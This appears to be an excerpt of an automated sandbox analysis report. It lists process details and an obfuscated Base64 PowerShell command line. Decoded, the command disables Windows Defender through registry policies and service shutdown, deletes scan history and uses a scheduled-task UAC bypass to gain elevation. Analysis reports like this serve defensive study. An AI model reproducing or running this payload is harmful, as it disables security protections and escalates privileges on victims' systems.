tAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAGUAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAJwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBsAGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA==
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	09:34:11
Start date:	23/05/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0AZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAGUAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoA